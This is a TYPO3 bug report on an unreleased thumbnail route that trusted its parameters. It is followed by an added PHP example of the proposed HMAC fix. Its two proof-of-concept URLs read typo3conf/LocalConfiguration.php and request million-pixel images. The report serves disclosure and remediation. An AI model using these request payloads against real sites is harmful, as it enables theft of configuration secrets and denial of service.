Bug #85875
Updated by Oliver Hader about 6 years ago
* information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage)
* denial of service (dimensions, basically whole configuration can be arbitrary)

Introduced in https://review.typo3.org/#/c/56765/ - not released yet to 9.4.0 nor 8.7.19

Solution: Add HMAC to all HTTP request parameters.

h2. PoC

XSRF Token has to be adjusted in the links below

h3. Information Disclosure

<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64
&processingInstructions%5Bheight%5D=64c
&processingInstructions%5Bcrop%5D=
</pre>

h3. Denial of Service

<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png
&processingInstructions%5Bwidth%5D=1000000
&processingInstructions%5Bheight%5D=1000000c
&processingInstructions%5Bcrop%5D=
</pre>
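As an added illustration of the proposed fix (example code, not TYPO3's own implementation): the backend signs fileIdentifier and the complete processingInstructions with a server-side secret when it generates the thumbnail link, and the controller verifies that MAC before it touches any file or image. The parameter name `hmac`, the function names and the secret are assumptions.

```php
<?php
// Added example, not TYPO3's own code: sign the thumbnail request parameters
// server-side and verify them before any file is read or image is rendered.
// $secret is assumed to be a server-side secret that is never sent to the client.
const HMAC_PARAM = 'hmac';
// Canonical form: recursively sort keys and stringify scalars so that neither parameter
// order nor int/string differences after query parsing change the MAC input.
function canonicalize(array $params): string
{
    $normalize = function (array $a) use (&$normalize): array {
        ksort($a, SORT_STRING);
        foreach ($a as $k => $v) {
            $a[$k] = is_array($v) ? $normalize($v) : (string) $v;
        }
        return $a;
    };
    return json_encode($normalize($params), JSON_THROW_ON_ERROR);
}
// Link generation: MAC over fileIdentifier and the complete processingInstructions.
function signParams(array $params, string $secret): array
{
    unset($params[HMAC_PARAM]);
    $params[HMAC_PARAM] = hash_hmac('sha256', canonicalize($params), $secret);
    return $params;
}
// Controller entry: reject any request whose parameters do not match the issued MAC.
function verifyParams(array $params, string $secret): bool
{
    if (!isset($params[HMAC_PARAM]) || !is_string($params[HMAC_PARAM])) {
        return false;
    }
    $given = $params[HMAC_PARAM];
    unset($params[HMAC_PARAM]);
    $expected = hash_hmac('sha256', canonicalize($params), $secret);
    return hash_equals($expected, $given); // constant-time comparison
}
// Constructed sample: a link the backend would issue, then the two tamperings from the PoC.
$secret = 'server-side-secret-placeholder';
$issued = signParams([
    'fileIdentifier' => '1:/user_upload/after_01.png',
    'processingInstructions' => ['width' => 64, 'height' => '64c', 'crop' => ''],
], $secret);
var_dump(verifyParams($issued, $secret));            // link exactly as issued
$disclosure = $issued;
$disclosure['fileIdentifier'] = 'typo3conf/LocalConfiguration.php';
$dos = $issued;
$dos['processingInstructions']['width'] = 1000000;
var_dump(verifyParams($disclosure, $secret), verifyParams($dos, $secret)); // tampered copies
```

Because the MAC covers every parameter the controller acts on, changing fileIdentifier or any dimension after the link was issued fails verification, which closes both the disclosure and the DoS path without having to whitelist each field separately.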